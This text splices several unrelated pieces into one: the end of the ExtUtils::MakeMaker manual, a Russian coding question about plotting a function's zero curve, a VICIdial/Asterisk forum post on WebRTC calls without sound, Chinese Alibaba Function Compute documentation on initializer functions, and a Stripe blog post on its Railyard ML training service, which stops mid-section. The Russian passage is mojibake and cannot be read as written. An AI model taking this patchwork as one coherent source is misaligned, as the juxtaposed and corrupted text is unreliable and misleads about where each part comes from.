If CPAN::Meta is installed, MakeMaker will automatically generate META.json and META.yml files for you and add them to your MANIFEST as part of the 'distdir' target (and thus the 'dist' target). This is intended to seamlessly and rapidly populate CPAN with module meta-data. If you wish to shut this feature off, set the NO_META WriteMakefile() flag to true.
At the 2008 QA Hackathon in Oslo, Perl module toolchain maintainers agrees to use the CPAN Meta format to communicate post-configuration requirements between toolchain components. These files, MYMETA.json and MYMETA.yml, are generated when Makefile.PL generates a Makefile (if CPAN::Meta is installed). Clients like CPAN or CPANPLUS will read this files to see what prerequisites must be fulfilled before building or testing the distribution. If you with to shut this feature off, set the NO_MYMETA WriteMakeFile() flag to true.
If some events detected in Makefile.PL imply that there is no way to create the Module, but this is a normal state of things, then you can create a Makefile which does nothing, but succeeds on all the "usual" build targets. To do so, use
use ExtUtils::MakeMaker qw(WriteEmptyMakefile);
WriteEmptyMakefile();
instead of WriteMakefile().
This may be useful if other modules expect this module to be built OK, as opposed to work OK (say, this system-dependent module builds in a subdirectory of some other distribution, or is listed as a dependency in a CPAN::Bundle, but the functionality is supported by different means on the current architecture).
my $value = prompt($message);
my $value = prompt($message, $default);
The prompt() function provides an easy way to request user input used to write a makefile. It displays the $message as a prompt for input. If a $default is provided it will be used as a default. The function returns the $value selected by the user.
If prompt() detects that it is not running interactively and there is nothing on STDIN or if the PERL_MM_USE_DEFAULT environment variable is set to true, the $default will be used without prompting. This prevents automated processes from blocking on user input.
If no $default is provided an empty string will be used instead.
Please note that while this module works on Perl 5.6, it is no longer being routinely tested on 5.6 - the earliest Perl version being routinely tested, and expressly supported, is 5.8.1. However, patches to repair any breakage on 5.6 are still being accepted.
Command line options used by MakeMaker->new(), and thus by WriteMakefile(). The string is split as the shell would, and the result is processed before any actual command line arguments are processed.
PERL_MM_OPT='CCFLAGS="-Wl,-rpath -Wl,/foo/bar/lib" LIBS="-lwibble -lwobble"'
If set to a true value then MakeMaker's prompt function will always return the default without waiting for user input.
Same as the PERL_CORE parameter. The parameter overrides this.
Module::Build is a pure-Perl alternative to MakeMaker which does not rely on make or any other external utility. It is easier to extend to suit your needs.
Module::Install is a wrapper around MakeMaker which adds features not normally available.
Dist::Zilla makes it easy for the module author to create MakeMaker-based distributions with lots of bells and whistles.
Andy Dougherty doughera@lafayette.edu, Andreas König andreas.koenig@mind.de, Tim Bunce timb@cpan.org. VMS support by Charles Bailey bailey@newman.upenn.edu. OS/2 support by Ilya Zakharevich ilya@math.ohio-state.edu.
Currently maintained by Michael G Schwern schwern@pobox.com
Send patches and ideas to makemaker@perl.org.
Send bug reports via http://rt.cpan.org/. Please send your generated Makefile along with your report.
For more up-to-date information, see https://metacpan.org/release/ExtUtils-MakeMaker.
Repository available at https://github.com/Perl-Toolchain-Gang/ExtUtils-MakeMaker.
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
ÐобÑого вÑемени ÑÑÑок!
ÐмееÑÑÑ ÑÑнкÑÐ¸Ñ Ð´Ð²ÑÑ Ð¿ÐµÑеменнÑÑ (ÑеÑаÑÑÐ°Ñ ÑÑнкÑиÑ):
def dec_func(self, x, y):
res = 0
for i, w in enumerate(self.W):
res += w * self.F[i](Point(x, y))
return res
ÐÑжно поÑÑÑоиÑÑ Ð³ÑаÑик ÑÑой ÑÑнкÑии, когда res = 0. Т.е. нÑжно из ÑпиÑка X Ð´Ð»Ñ ÐºÐ°Ð¶Ð´Ð¾Ð³Ð¾ x полÑÑиÑÑ Ñакие y, ÑÑÐ¾Ð±Ñ Ð¿Ñи вÑполнении ÑÑнкÑии, ÑезÑлÑÑÐ°Ñ Ð±Ñл Ñавен 0.
UPD:
ÐÑÑÑ ÑÐµÐ°Ð»Ð¸Ð·Ð¾Ð²Ð°Ð½Ð½Ð°Ñ ÑÑнкÑиÑ, коÑоÑÐ°Ñ Ð¿Ð¾ заданнÑм X Ð¼Ð¾Ð¶ÐµÑ Ð¿Ð¾Ð»ÑÑиÑÑ Ð¿ÑимеÑно веÑнÑе Y (Ñ Ð¾Ð¿Ñеделенной ÑоÑноÑÑÑÑ):
def plot_data(self, start=-15, end=15, step=1):
X = [i for i in range(start, end, step)]
Y = []
x_to_remove = []
for x in X:
k = 0
y_old = 0
step = 0.05
old_res = self.dec_func(x, y_old)
while abs(old_res) > 0.01:
if k > 3000:
break
k += 1
y = y_old + step
res = self.dec_func(x, y)
if abs(old_res) > abs(res):
y_old = y
step *= 1.2
else:
y_old = y
step = -step / 2
old_res = res
if k > 3000:
print(y_old, x, old_res)
x_to_remove.append(x)
else:
Y.append(y_old)
for x in x_to_remove:
X.remove(x)
return X, Y
Ðо пÑоблема в Ñом, ÑÑо Ð´Ð°Ð½Ð½Ð°Ñ ÑеализаÑÐ¸Ñ Ð½Ðµ позволÑÐµÑ Ð¿Ð¾Ð»ÑÑиÑÑ Ð½ÐµÑколÑко знаÑений y Ð´Ð»Ñ Ð¾Ð´Ð½Ð¾Ð³Ð¾ x.
|
Hello to all this community, this is my first post and I want to make this thread to all the people facing the same issue, I made a fresh install of vicidial with asterisk Version 13.34.0-vici and everything works fine with the actual setup, but my main problem is the WebRTC, we can make calls VIA sip to softphones, and we receive and send calls, i took down the firewall for WebRTC test, but anyways, i got no sound with my actual setup, I tried the same setup on AWS ec2 but no resolution to my case.
debug to webrtc phone
2020-10-06 20:29:51 =>
displayName: gs102
uri: gs102@10.128.0.8
authorizationUser: gs102
password: ****
wsServers: wss://FQDN:8089/ws
and seems almost promising but, i feel that i missing something and i hope you can help me with that, the phone registrations works but i got no sound and checking my asterisk console, i got this error
[Oct 6 22:30:03] WARNING[2269]: sip/config_parser.c:819 sip_parse_nat_option: nat=yes is deprecated, use nat=force_rport,comedia instead
[Oct 6 22:30:03] WARNING[2269]: chan_sip.c:33172 reload_config: Cannot use 'tcp' transport with tcpenable=no. Removing from available transports.
[Oct 6 22:30:03] WARNING[2269]: chan_sip.c:33185 reload_config: No valid default transport. Selecting 'udp' as default.
[Oct 6 22:30:03] == Using SIP CoS mark 4
[Oct 6 22:30:03] WARNING[2269]: chan_sip.c:30880 set_insecure_flags: Unknown insecure mode 'very' on line 18
[Oct 6 22:30:03] WARNING[2269]: sip/config_parser.c:819 sip_parse_nat_option: nat=yes is deprecated, use nat=force_rport,comedia instead
[Oct 6 22:30:07] == Manager 'sendcron' logged on from 127.0.0.1
[Oct 6 22:30:07] == Manager 'sendcron' logged off from 127.0.0.1
[Oct 6 22:30:16] -- Reloading module 'res_musiconhold.so' (Music On Hold Resource)
[Oct 6 22:30:23] ERROR[2269]: utils.c:1499 ast_careful_fwrite: fflush() returned error: Bad file descriptor
[Oct 6 22:30:23] ERROR[2269]: tcptls.c:488 tcptls_stream_close: SSL_shutdown() failed: error:00000005:lib(0):func(0):DH lib, Underlying BIO error: Bad file descriptor
[Oct 6 22:30:23] == WebSocket connection from '190.87.160.176:51050' forcefully closed due to fatal write error
And I tried to set up all step by step, I have knowledge about programming and values but I missing something, i will post the asterisk setup as well but resumed
[general]
enabled=yes
bindaddr=0.0.0.0
bindport=8088
enablestatic=yes
tlsenable=yes
tlsbindaddr=0.0.0.0:8089
tlscertfile=/etc/certbot/live/FQDN/cert.pem
tlsprivatekey=/etc/certbot/live/FQDN/privkey.pem
that’s the main setup, and the ssl certs works, i mean, when load the page it says that is secure, btw, I force all the connections to ssl, this is my sip.conf code, again, resumed
[general]
transport=tcp,udp,ws,wss
avpf=yes
udpbindaddr=0.0.0.0:5060
tcpbinaddr=0.0.0.0:5060
context=trunkinbound
allowguest=no
allowoverlap=no
realm=FQDN
bindport=5060
bindaddr=0.0.0.0
srvlookup=yes
disallow=all ; First disallow all codecs
allow=ulaw ; Allow codecs in order of preference
allow=gsm
mohinterpret=default
mohsuggest=default
language=en
relaxdtmf=yes
trustrpid = no
sendrpid = yes
progressinband=no
videosupport=no
callevents=yes
dtmfmode = rfc2833
rtptimeout=60
notifyringing = yes ;
notifyhold = yes
externip = MYEXTERNALIP
localnet=192.168.0.0/255.255.0.0
localnet=10.0.0.0/255.0.0.0
localnet=172.16.0.0/12
localnet=169.254.0.0/255.255.0.0
nat=yes
canreinvite=no
jbenable = yes
jbforce = no
jbmaxsize = 100
jbresyncthreshold = 1000
jbimpl = fixed
jblog = no
qualify=yes
limitonpeer = yes
I used Amazon ec2 to have the same system, but now i’m using Google cloud, but is the same issue and i tried to fixed the two times, but no fix with the webrtc, i had setup the websocket server, but i think i’m missing some extra configuration that I will be glad if you can help me.
|
Initializer 是函数的初始化逻辑入口,不同于请求处理逻辑入口的 handler。在有函数初始化的需求场景中,设置了 Initializer 后,函数计算首先调用 initializer 完成函数的初始化,成功后再调用 handler 处理请求;没有函数初始化的需求则可以跳过 initializer,直接调用 handler 处理请求。
适用场景
用户函数调用链路包括以下几个阶段:1)系统为函数分配计算资源;2)下载代码;3)启动容器并加载函数代码;4)用户函数内部进行初始化逻辑;5)函数处理请求并将结果返回。其中1,2,3步是系统层面的冷启动开销,通过对调度以及各个环节的优化,函数计算(FC)能做到负载快速增长时稳定的延时。更多详情,请参阅 函数计算冷启动优化最佳实践。第4步是函数内部初始化逻辑,属于应用层面的冷启动开销,例如深度学习场景下加载规格较大的模型、数据库场景下连接池构建、函数依赖库加载等等。为了减小应用层冷启动对延时的影响,函数计算推出了 initializer 接口,系统能识别用户函数的初始化逻辑,从而在调度上做相应的优化。
功能价值
引入 initializer 接口的价值:
分离初始化逻辑和请求处理逻辑,程序逻辑更清晰,让用户更易写出结构良好,性能更优的代码。
用户函数代码更新时,系统能够保证用户函数的平滑升级,规避应用层初始化冷启动带来的性能损耗。新的函数实例启动后能够自动执行用户的初始化逻辑,在初始化完成后再处理请求。
在应用负载上升,需要增加更多函数实例时,系统能够识别函数应用层初始化的开销,更精准的计算资源伸缩的时机和所需的资源量,让请求延时更加平稳。
即使在用户有持续的请求且不更新函数的情况下,FC系统仍然有可能将已有容器回收或更新,这时没有平台方(FC)的冷启动,但是会有业务方冷启动,Initializer可以最大限度减少这种情况。
Initializer 接口规范
各个 runtime 的 initializer 接口有以下共性:
无自定义参数
Initializer 不支持用户自定义参数,只能获取函数计算提供的 context 参数中的变量进行相关逻辑处理,详细介绍请参考 Context 对象。
无返回值
用户无法从 invoke 的响应中获取 initializer 预期的返回值。如果 initializer 执行失败,用户能够通过 response 中的 X-Fc-Error-Type 和 body 来确认 initializer 无法成功执行的出错类型,建议开启 Logging 功能,便于错误定位。
超时时间
用户可单独设置 initializer 的超时时间,与 handler 的超时相互独立,但最长不超过 300 秒。
执行时机
运行函数逻辑的进程称之为函数实例,运行在容器内。系统会根据用户负载伸缩函数实例。每当有新函数实例创建时,系统会首先调用 initializer。系统保证一定 initializer 执行成功后才会执行 handler 逻辑。
最多成功执行一次
系统保证每个函数实例启动后只会成功执行一次 initializer 。如果执行失败,那么该函数实例在收到 Invoke 请求之后都会先执行 initializer。一旦执行成功,那么该实例的生命周期内不会再执行 initializer ,收到 Invoke 请求之后只执行请求处理函数。
initializer 入口命名
除 Java 外,其他 runtime 的 initializer 入口命名规范与原有的处理函数入口命令 保持一致,格式为
[文件名].[ initializer 名],其中 initializer 名可自定义。Java 需要定义一个类并实现函数计算预定义的初始化接口。
计量计费
Initializer 的执行时间也会被计量,用户需要为此付费,initializer 只对执行时间和公网流量这两项进行计费,计量规则不变,详情参考 计费方式。
Initializer 入口
下文将函数计算目前所支持语言中对 initializer 入口的定义以及参数意义进行介绍,目录如下:
Nodejs
函数计算目前支持以下 Nodejs 运行环境:
Nodejs 6.1(runtime = Nodejs6)
Nodejs 8.9(runtime = Nodejs8)
initializer 入口:index.initializer
Initializer 入口 格式为 [文件名].[initializer 名]。例如,实现 initializer 接口时指定的 Initializer 入口为 index.initializer,那么函数计算会去加载 index.js 中定义的 initializer 函数。
在函数计算服务中使用 Nodejs 编写 initializer 逻辑,需要定义一个 Nodejs 函数作为 initializer 入口,一个最简单的 initializer 示例如下:
exports.initializer = function(context, callback) {
callback(null, '');
};
说明如果您需要在 HTTP 触发器中使用 initializer,HTTP 触发器和 initializer 的结构和参数都保持不变。详细信息请参考Node.js HTTP 函数。
函数名
exports.initializer需要与实现 initializer 接口时的 Initializer 字段相对应:例如创建函数时指定的 Initializer 入口为index.initializer,那么函数计算会去加载index.js中定义的initializer函数。
context 参数
context 参数中包含一些函数的运行时信息(例如 request id / 临时 AK / function meta 等)。其类型是
object,具体结构和使用在下面的 Node.js 运行环境 介绍。
callback 参数
callback 参数用于返回调用函数的结果,其签名是
function(err, data),与 Nodejs 中惯用的 callback 一样,它的第一个参数是 error,第二个参数 data。如果调用时 err 不为空,则函数将返回HandledInitializationError,由于屏蔽了初始化函数的返回值,所以 data 中的数据是无效的,可以参考上文的示例设置为空。
Python
函数计算目前支持以下 Python 运行环境:
Python 2.7 (runtime = python2.7)
Python 3.6 (runtime = python3)
initializer 入口: main.my_initializer
Initializer 入口 格式为 “[文件名].[initializer 名]”。例如实现 initializer 接口时指定的 Initializer 入口为 main.my_initializer,那么函数计算会去加载 main.py 中定义的 my_initializer 函数。
在函数计算服务中使用 Python 编写 initializer,需要定义一个 Python 函数作为 initializer 入口,一个最简单的 initializer 示例如下:
def my_initializer(context):
print("hello world!")
说明如果您需要在 HTTP 触发器中使用 initializer 功能,HTTP 触发器和 initializer 的结构和参数都保持不变。详细信息请参考 Python HTTP 函数。
函数名
my_initializer需要与实现 initializer 接口时的 Initializer 字段相对应:实现 initializer 接口时指定的Initializer 入口为main.my_initializer,那么函数计算会去加载main.py中定义的my_initializer函数。
context 参数
context 参数中包含一些函数的运行时信息(例如 request id / 临时 AK / function meta 等)。其类型是
FCContext,具体结构和使用在下面的Python 运行环境介绍。
PHP
函数计算目前支持以下 Php 运行环境:
Php 7.2(runtime = Php7.2)
Initializer 入口: main.my_initializer
Initializer 格式为 “[文件名].[initializer 名]”。例如创建函数时指定的 initializer为 main.my_initializer,那么函数计算会去加载 main.php 中定义的 my_initializer 函数。
在函数计算服务中使用 Php 实现 initializer 接口 ,需要定义一个 Php 函数作为 initializer 入口,一个最简单的 initializer 示例如下:
<?php
function my_initializer($context) {
echo 'hello world' . PHP_EOL;
}
?>
说明如果您需要在 HTTP 触发器中使用 initializer 功能,HTTP 触发器和 initializer 的结构和参数都保持不变。详细信息请参考PHP HTTP 函数。
函数名
my_initializer需要与实现 initializer 接口时的 initializer 字段相对应:例如实现 initializer 接口时指定的Initializer 入口为main.my_initializer,那么函数计算会去加载main.php中定义的my_initializer函数。
context 参数
context 参数中包含一些函数的运行时信息(例如 request id / 临时 AK / function meta 等)。其类型是
FCContext,具体结构和使用在下面的PHP 运行环境介绍。
Java
函数计算目前支持以下Java运行环境:
OpenJDK 1.8.0(runtime = java8)
Initializer 入口:example.HelloFC::initialize
Initializer 的格式为 {package}.{class}::{method}。例如包名是 example,类名是 HelloFC,那么实现 initializer 接口时指定的 Initializer 入口为 example.HelloFC::initialize。
在函数计算服务使用 Java 编程,需要定义一个类并实现函数计算预定义的接口,一个最简单的 initializer 示例如下:
package example;
import com.aliyun.fc.runtime.Context;
import com.aliyun.fc.runtime.FunctionComputeLogger;
import com.aliyun.fc.runtime.FunctionInitializer;
import java.io.IOException;
public class HelloFC implements FunctionInitializer {
@Override
public void initialize(Context context) throws IOException {
FunctionComputeLogger logger = context.getLogger();
logger.debug(String.format("RequestID is %s %n", context.getRequestId()));
}
}
包名/类名
包名和类名可以是任意的,但是需要与创建函数时的 "initializer" 字段相对应:上面的例子包名是 "example",类名是 "HelloFC",那么创建函数时指定的 Initializer 为
example.HelloFC::initialize,"Handler" 的格式为{package}.{class}::{method}
实现的接口
用户的代码中必须要实现函数计算预定义的接口。上面的例子中实现了
FunctionInitializer,函数参数没有 input 和 output。
context 参数
context 参数中包含一些函数的运行时信息(例如 request id / 临时 AK / function meta 等)。其类型是
com.aliyun.fc.runtime.Context,具体结构和使用在下面的 Java 运行环境介绍。
使用流程和处理函数的使用是一致的,具体可以参考Java的 Java runtime 相关介绍。
initializer 比 global variable 更适合初始化
首先看一个简单的 demo 了解两种编写方式,下面函数的功能为连接数据库(初始化逻辑)并查询数据(处理逻辑)。
initializer 编写方式:
import pymysql.cursors
connection = None
# my_initializer: initializer function
def my_initializer(context):
global connection
connection = pymysql.connect(host='localhost',
user='user',
password='passwd',
db='db',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
def my_handler(event, context):
global connection
with connection.cursor() as cursor:
# Read a single record
sql = "SELECT count(*) FROM `users`"
cursor.execute(sql)
result = cursor.fetchone()
return result
global variable 编写方式:
import pymysql.cursors
initialized = False
def my_handler(event, context):
global initialized
if not initialized:
connection = pymysql.connect(host='localhost',
user='user',
password='passwd',
db='db',
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
initialized = True
with connection.cursor() as cursor:
# Read a single record
sql = "SELECT count(*) FROM `users`"
cursor.execute(sql)
result = cursor.fetchone()
return result
多数场景下,用户可以将函数逻辑分为初始化逻辑和处理逻辑,其中初始化逻辑可以是深度学习场景下加载规格较大的模型、数据库场景下连接池构建、函数依赖库加载等等,初始化逻辑往往会产生应用层冷启动。使用 initializer 接口和 global variable 方式都可以保证函数的初始化逻辑仅执行一次,达到优化应用层冷启动的效果,但会在以下场景产生不同的效果:
Invoke 请求触发函数计算(FC)后台创建新的函数实例 / 负载上升创建更多实例:在使用 initializer 功能时,可以在 invoke 请求到来之前完成初始化逻辑,保证应用层冷启动不会对处理函数的功能和性能产生影响。global variable 方式的初始化逻辑和处理逻辑执行时机都是在 invoke 请求到来时连续执行的,初始化逻辑执行时间的长短往往会对处理逻辑产生影响。
函数升级:使用 initializer 功能后系统能够保证用户函数的平滑升级,规避应用层初始化冷启动带来的性能损耗。新的函数实例启动后能够自动执行用户的初始化逻辑,在初始化完成后再处理请求。global variable 方式在新的函数实例启动后并不会规避应用层初始化冷启动。
FC系统周期性回收或更新已有容器:即使在用户有持续的请求且不更新函数的情况下,FC系统仍然有可能将已有容器回收或更新,这时没有平台方(FC)的冷启动,但是会有业务方冷启动,Initializer可以最大限度减少这种情况。global variable 方式并不会减少这类情况。
|
Stripe uses machine learning to respond to our users’ complex, real-world problems. Machine learning powers Radar to block fraud, and Billing to retry failed charges on the network. Stripe serves millions of businesses around the world, and our machine learning infrastructure scores hundreds of millions of predictions across many machine learning models. These models are powered by billions of data points, with hundreds of new models being trained each day. Over time, the volume, quality of data, and number of signals have grown enormously as our models continuously improve in performance.
Running infrastructure at this scale poses a very practical data science and ML problem: how do we give every team the tools they need to train their models without requiring them to operate their own infrastructure? Our teams also need a stable and fast ML pipeline to continuously update and train new models as they respond to a rapidly changing world. To solve this, we built Railyard, an API and job manager for training these models in a scalable and maintainable way. It’s powered by Kubernetes, a platform we’ve been working with since late 2017. Railyard enables our teams to independently train their models on a daily basis with a centrally managed ML service.
In many ways, we’ve built Railyard to mirror our approach to products for Stripe’s users: we want teams to focus on their core work training and developing machine learning models rather than operating infrastructure. In this post, we’ll discuss Railyard and best practices for operating machine learning infrastructure we’ve discovered while building this system.
Effective machine learning infrastructure for organizations
We’ve been running Railyard in production for a year and a half, and our ML teams have converged on it as their common training environment. After training tens of thousands of models on this architecture over that period, here are our biggest takeaways:
Build a generic API, not tied to any single machine learning framework.Teams have extended Railyard in ways we did not anticipate. We first focused on classifiers, but teams have since adopted the system for applications such as time series forecasting and word2vec style embeddings.
A fully managed Kubernetes cluster reduces operational burden across an organization.Railyard interacts directly with the Kubernetes API (as opposed to a higher level abstraction), but the cluster is operated entirely by another team. We’re able to learn from their domain knowledge to keep the cluster running reliably so we can focus on ML infrastructure.
Our Kubernetes cluster gives us great flexibility to scale upWe can easily scale our cluster volume when we need to train more models, or quickly add new instance types when we need additional compute resources.andout.
Centrally tracking model state and ownership allows us to easily observe and debug training jobs.We’ve moved from asking, “Did you save the output of your job anywhere so we can look at?” to “What’s your job ID? We’ll figure the rest out.” We observe aggregate metrics and track the overall performance of training jobs across the cluster.
Building an API for model training enables us to use it everywhere.Teams can call our API from any service, scheduler, or task runner. We now use Railyard to train models using an Airflow task definition as part of a larger graph of data jobs.
The Railyard architecture
In the early days of model training at Stripe, an engineer or data scientist would SSH into an EC2 instance and manually launch a Python process to train a model. This served Stripe’s needs at the time, but had a number of challenges and open questions for our Machine Learning Infrastructure team to address as the company grew:
How do we scale model training from ad-hoc Python processes on shared EC2 instances to automatically training hundreds of models a day?
How do we build an interface that is generic enough to support multiple training libraries, frameworks, and paradigms while remaining expressive and concise?
What metrics and metadata do we want to track for each model run?
Where should training jobs be executed?
How do we scale different compute resource needs (CPU, GPU, memory) for different model types?
Our goal when designing this system was to enable our data scientists to think less about how their machine learning jobs are run on our infrastructure, and instead focus on their core inquiry. Machine learning workflows typically involve multiple steps that include loading data, training models, serializing models, and persisting evaluation data. Because Stripe runs its infrastructure in the cloud, we can manage these processes behind an API: this reduces cognitive burden for our data science and engineering teams and moves local processes to a collaborative, shared environment. After a year and a half of iteration and collaboration with teams across Stripe, we’ve converged on the following system architecture for Railyard. Here’s a high-level overview:
Railyard runs on a Kubernetes cluster and pairs jobs with the right instance type.
Railyard provides a JSON API and is a Scala service that manages job history, state, and provenance in a Postgres database. Jobs are executed and coordinated using the Kubernetes API, and our Kubernetes cluster provides multiple instance types with different compute resources. The cluster can pair jobs with the right instance type: for example, most jobs default to our high-CPU instances, data-intensive jobs run on high-memory instances, and specialized training jobs like deep learning run on GPU instances.
We package the Python code for model training using Subpar, a Google library that creates a standalone executable that includes all dependencies in one package. This is included in a Docker container, deployed to the AWS Elastic Container Registry, and executed as a Kubernetes job. When Railyard receives an API request, it runs the matching training job and logs are streamed to S3 for inspection. A given job will run through multiple steps, including fetching training and holdout data, training the model, and serializing the trained model and evaluation data to S3. These training results are persisted in Postgres and exposed in the Railyard API.
Railyard’s API design
The Railyard API allows you to specify everything you need to train a machine learning model, including data sources and model parameters. In designing this API we needed to answer the following question: how do we provide a generic interface for multiple training frameworks while remaining expressive and concise for users?
We iterated on a few designs with multiple internal customers to understand each use case. Some teams only needed ad-hoc model training and could simply use SQL to fetch features, while others needed to call an API programmatically hundreds of times a day using features stored in S3. We explored a number of different API concepts, arriving at two extremes on either end of the design spectrum.
On one end, we explored designing a custom DSL to specify the entire training job by encoding scikit-learn components directly in the API itself. Users could include scikit-learn pipeline components in the API specification and would not need to write any Python code themselves.
On the other end of the spectrum we reviewed designs to allow users to write their own Python classes for their training code with clearly defined input and output interfaces. Our library would be responsible for both the necessary inputs to train models (fetching, filtering, and splitting training and test data) and the outputs of the training pipeline (serializing the model, and writing evaluation and label data). The user would otherwise be responsible for writing all training logic.
In the end, any DSL-based approach ended up being too inflexible: it either tied us to a given machine learning framework or required that we continuously update the API to keep pace with changing frameworks or libraries. We converged on the following split: our API exposes fields for changing data sources, data filters, feature names, labels, and training parameters, but the core logic for a given training job lives entirely in Python.
Here’s an example of an API request to the Railyard service:
{
// What does this model do?
"model_description": "A model to predict fraud",
// What is this model called?
"model_name": "fraud_prediction_model",
// What team owns this model?
"owner": "machine-learning-infrastructure",
// What project is this model for?
"project": "railyard-api-blog-post",
// Which team member is training this model?
"trainer": "robstory",
"data": {
"features": [
{
// Columns we’re fetching from Hadoop Parquet files
"names": ["created_at", "charge_type", "charge_amount",
"charge_country", "has_fraud_dispute"],
// Our data source is S3
"source": "s3",
// The path to our Parquet data
"path": "s3://path/to/parquet/fraud_data.parq"
}
],
// The canonical date column in our dataset
"date_column": "created_at",
// Data can be filtered multiple times
"filters": [
// Filter out data before 2018-01-01
{
"feature_name": "created_at",
"predicate": "GtEq",
"feature_value": {
"string_val": "2018-01-01"
}
},
// Filter out data after 2019-01-01
{
"feature_name": "created_at",
"predicate": "LtEq",
"feature_value": {
"string_val": "2019-01-01"
}
},
// Filter for charges greater than $10.00
{
"feature_name": "charge_amount",
"predicate": "Gt",
"feature_value": {
"float_val": 10.00
}
},
// Filter for charges in the US or Canada
{
"feature_name": "charge_country",
"predicate": "IsIn",
"feature_value": {
"string_vals": ["US", "CA"]
}
}
],
// We can specify how to treat holdout data
"holdout_sampling": {
"sampling_function": "DATE_RANGE",
// Split holdout data from 2018-10-01 to 2019-01-01
// into a new dataset
"date_range_sampling": {
"date_column": "created_at",
"start_date": "2018-10-01",
"end_date": "2019-01-01"
}
}
},
"train": {
// The name of the Python workflow we're training
"workflow_name": "StripeFraudModel",
// The list of features we're using in our classifier
"classifier_features": [
"charge_type", "charge_amount", "charge_country"
],
"label": "is_fraudulent",
// We can include hyperparameters in our model
"custom_params": {
"objective": "reg:linear",
"max_depth": 6,
"n_estimators": 500,
"min_child_weight": 50,
"learning_rate": 0.02
}
}
}
We learned a few lessons while designing this API:
Be flexible with model parameters.Providing a free-formcustom_paramsfield that accepts any valid JSON was very important for our users. We validate most of the API request, but you can’t anticipateeveryparameter a machine learning engineer or data scientist needs for all of the model types they want to use. This field is most frequently used to include a model’s hyperparameters.
Not providing a DSL was the right choice (for us).Finding the sweet spot for expressiveness in an API for machine learning is difficult, but so far the approach outlined above has worked out well for our users. Many users only need to change dates, data sources, or hyperparameters when retraining. We haven’t gotten any requests to add more DSL-like features to the API itself.
The Python workflow
Stripe uses Python for all ML model training because of its support for many best-in-class ML libraries and frameworks. When the Railyard project started we only had support for scikit-learn, but have since added XGBoost, PyTorch, and FastText. The ML landscape changes very quickly and we needed a design that didn’t pick winners or constrain users to specific libraries. To enable this extensibility, we defined a framework-agnostic workflow that presents an API contract with users: we pass data in, you pass a trained model back out, and we’ll score and serialize the model for you. Here’s what a minimal Python workflow looks like:
class StripeFraudModel(StripeMLWorkflow):
# A basic model training workflow: all workflows inherit
# Railyard’s StripeMLWorkflow class
def train(self, training_dataframe, holdout_dataframe):
# Construct an estimator using specified hyperparameters
estimator = xgboost.XGBRegressor(**self.custom_params)
# Serialize the trained model once training is finished;
# we're using an in-house serialization library.
serializable_estimator = stripe_ml.make_serializable(estimator)
# Train our model
fitted_model = serializable_estimator.fit(
training_dataframe[self.classifier_features],
training_dataframe[self.classifier_label]
)
# Hand our fitted model back to Railyard to serialize
return fitted_model
Teams start adopting Railyard with an API specification and a workflow that defines a train method to train a classifier with the data fetched from the API request. The StripeMLWorkflow interface supports extensive customization to adapt to different training approaches and model types. You can preprocess your data before it gets passed in to the train function, define your own data fetching implementation, specify how you want training/holdout data to be scored, and run any other Python code you need. For example, some of our deep learning models have custom data fetching code to stream batches of training data for model training. When your training job finishes you’ll end up with two output: a model identifier for your serialized model that can be put into production, and your evaluation data in S3.
If you build a machine learning API specification, here are a few things to keep in mind:
Interfaces are important.Users will want to load and transform data in ways you didn’t anticipate, train models using unsupported patterns, and write out unfamiliar types of evaluation data. It’s important to provide standard API interfaces like fetch_data, preprocess, train, and write_evaluation_data that specify some standard data containers (e.g., Pandas DataFrame and Torch Dataset) but are flexible in how they are generated and used.
Users should not need to think about model serialization or persistence.Reducing their cognitive burden makes their lives easier and gives them more time to be creative and focus on modeling and feature engineering. Data scientists and ML engineers already have enough to think about between feature engineering, modeling, evaluation, and more. They should be able to train and hand over their model to your scoring infrastructure without ever needing to think about how it gets serialized or persisted.
Define metrics for each step of the training workflow.Make sure you’re gathering fine-grained metrics for each training step: data loading, model training, model serialization, evaluation data persistence, etc. We store high-level success and failure metrics that can be examined by team, project, or the individual machine performing the training. On a functional level,our team uses these metrics to debug and profile long-running or failed jobs, and provide feedback to the appropriate team when there’s a problem with a given training job. And on a collaborative level, these metrics have changed how our team operates. Moving from a reactive stance (“My model didn’t train, can you help?”) to a proactive one (“Hey, I notice your model didn’t train, here’s what happened”) has helped us be better partners to the many teams we work with.
Scaling Kubernetes
Railyard coordinates hundreds of machine learning jobs across our cluster, so effective resource management across our instances is crucial. The first version of Railyard simply ran individual subprocesses from the Scala service that manages all jobs across our cluster. We would get a request, start Java’s ProcessBuilder, and kick off a subprocess to build a Python virtualenv and train the model. This basic implementation allowed us to quickly iterate on our API in our early days, but managing subprocesses wasn’t going to scale very well. We needed a proper job management system that met a few requirements:
Scaling the cluster quickly for different resource/instance types
Routing models to specific instances based on their resource needs
Job queueing to prioritize resources for pending work
Luckily, our Orchestration team had been working hard to build a reliable Kubernetes cluster and suggested this new cluster would be a good platform for Railyard’s needs. It was a great fit; a fully managed Kubernetes cluster provides all of the pieces we needed to meet our system’s requirements.
Containerizing Railyard
To run Railyard jobs on Kubernetes, we needed a way to reliably package our Python code into a fully executable binary. We use Google’s Subpar library which allows us to package all of our Python requirements and source code into a single .par file for execution. The library also includes support for the Bazel build system out of the box. Over the past few years, Stripe has been moving many of its builds to Bazel; we appreciate its speed, correctness, and flexibility in a multi-language environment.
With Subpar you can define an entrypoint to your Python executable and Bazel will build your .par executable to bundle into a Dockerfile:
par_binary(
name = "railyard_train",
srcs = ["@.../ml:railyard_srcs"],
data = ["@.../ml:railyard_data"],
main = "@.../ml:railyard/train.py",
deps = all_requirements,
)
With the Subpar package built, the Kubernetes command only needs to execute it with Python:
command: ["sh"]args: ["-c", "python /railyard_train.par"]
Within the Dockerfile we package up any other third-party dependencies that we need for model training, such as the CUDA runtime to provide GPU support for our PyTorch models. After our Docker image is built, we deploy it to AWS’s Elastic Container Repository so our Kubernetes cluster can fetch and run the image.
Running diverse workloads
Some machine learning tasks can benefit from a specific instance type with resources optimized for a given workload. For example, a deep learning task may be best suited for a GPU instance while fraud models that employ huge datasets should be paired with high-memory instances. To support these mixed workloads we added a new top-level field to the Railyard API request to specify the compute resource for jobs running on Kubernetes:
{
"compute_resource": "GPU"
}
Railyard supports training models on CPU, GPU, or memory-optimized instances. Models for our largest datasets can require hundreds of gigabytes of memory to train, while our smaller models can train quickly on smaller (and less expensive) instance types.
Scheduling and distributing jobs
